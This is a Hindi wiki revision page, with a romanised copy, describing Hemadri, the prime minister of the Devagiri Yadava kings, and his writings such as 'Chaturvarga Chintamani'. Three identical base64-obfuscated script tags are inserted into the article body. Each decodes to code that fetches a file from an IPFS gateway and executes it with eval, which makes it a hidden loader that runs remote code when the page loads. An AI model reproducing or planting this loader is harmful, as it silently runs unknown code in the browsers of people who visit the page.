Difference between revisions of "हेमाद्रि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''हेमाद्रि''' एक प्रसिद्ध धर्मशास्त्रकार थे, जो [[दक्ष...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''हेमाद्रि''' एक प्रसिद्ध धर्मशास्त्रकार थे, जो [[दक्षिण भारत]] में हुए। उन्हें [[वारंगल]] के [[यादव वंश|यादव]] राजाओं का संरक्षण प्राप्त था।
+
'''हेमाद्रि''' [[देवगिरि का यादव वंश|देवगिरि के यादव]] राजा महादेव (1259-1271 ई.) एवं राजा रामचन्द्र (1271-1309 ई.) के प्रधानमंत्री थे। वे एक कुशल प्रशासक, वास्तुकार, [[कवि]] और आध्यात्मविद थे। उनके प्रधानमंत्रीत्व काल में [[यादव वंश|यादव कुल]] की ख्याति अपने चरमोत्कर्ष पर थी।
 +
 
 +
*हेमाद्रि को 'हेमाद्रिपंत' के नाम से भी जाना जाता है। तेरहवी शताब्दी में [[कर्नाटक]] के दक्षिण कन्नड़ के एक छोटे से ग्राम हेमाद्री के स्मार्त ऋग्वेदी, वत्स गोत्री, शाकालशक्शी कर्हाड़े ब्राह्मण परिवार में जन्मे हेमाद्रिपंत को उनके पिता कामदेओ बहुत छोटी उम्र में [[महाराष्ट्र]] ले आये थे।
 +
*हेमाद्रिपंत ने बहुत-सी धार्मिक पुस्तकें लिखीं, जिनमें 'चतुर्वर्ग चिंतामणि' प्रमुख है, जिसमें हज़ारों व्रतों और उनके करने के विधान का वर्णन है।
 +
*चिकित्सा के सम्बन्ध में भी उन्होंने 'आयुर्वेद रहस्यं' नामक पुस्तक लिखी थी, जिसमें हज़ारो बीमारियों और उनके निदान के बारे में लिखा गया है।
 +
*एक ऐतिहासिक पुस्तक की रचना भी हेमाद्रिपंत ने की थी, जिसका नाम 'हेमाद्पंती बखर' है।
 +
*प्रशासन और राजकीय कार्यों में एकरूपता लाने के लिए भी हेमाद्रि ने एक पुस्तक लिखी, जिसमें राज-काज के दैनिक कार्यों की प्रक्रिया को विस्तार से निश्चित किया गया है।
 +
*हेमाद्रिपंत ने महाराष्ट्र में [[महालक्ष्मी]] के पूजन को प्रोत्साहित किया और इसे वैभवशाली बनाने में भी बहुत योगदान दिया।
  
*वर्ष 1260 ई. 1309 ई. के बीच किसी समय हेमाद्रि ने अपना प्रसिद्ध ग्रंथ 'चतुर्वर्गचिंतामणि' लिखा था।
 
*हेमाद्रि द्वारा लिखित [[ग्रंथ]] में व्रत, दान, तीर्थ यात्रा, मोक्ष प्राप्ति, [[श्राद्ध]] आदि के विशद नियम वर्णित है।
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 11: Line 16:
 
[[Category:दार्शनिक]][[Category:चरित कोश]][[Category:दर्शन कोश]][[Category:इतिहास कोश]]
 
[[Category:दार्शनिक]][[Category:चरित कोश]][[Category:दर्शन कोश]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__
__NOTOC__
 

Latest revision as of 12:53, 10 November 2016

hemadri devagiri ke yadav raja mahadev (1259-1271 ee.) evan raja ramachandr (1271-1309 ee.) ke pradhanamantri the. ve ek kushal prashasak, vastukar, kavi aur adhyatmavid the. unake pradhanamantritv kal mean yadav kul ki khyati apane charamotkarsh par thi.

  • hemadri ko 'hemadripant' ke nam se bhi jana jata hai. terahavi shatabdi mean karnatak ke dakshin kann d ke ek chhote se gram hemadri ke smart rrigvedi, vats gotri, shakalashakshi karha de brahman parivar mean janme hemadripant ko unake pita kamadeo bahut chhoti umr mean maharashtr le aye the.
  • hemadripant ne bahut-si dharmik pustakean likhian, jinamean 'chaturvarg chiantamani' pramukh hai, jisamean hazaroan vratoan aur unake karane ke vidhan ka varnan hai.
  • chikitsa ke sambandh mean bhi unhoanne 'ayurved rahasyan' namak pustak likhi thi, jisamean hazaro bimariyoan aur unake nidan ke bare mean likha gaya hai.
  • ek aitihasik pustak ki rachana bhi hemadripant ne ki thi, jisaka nam 'hemadpanti bakhar' hai.
  • prashasan aur rajakiy karyoan mean ekaroopata lane ke lie bhi hemadri ne ek pustak likhi, jisamean raj-kaj ke dainik karyoan ki prakriya ko vistar se nishchit kiya gaya hai.
  • hemadripant ne maharashtr mean mahalakshmi ke poojan ko protsahit kiya aur ise vaibhavashali banane mean bhi bahut yogadan diya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>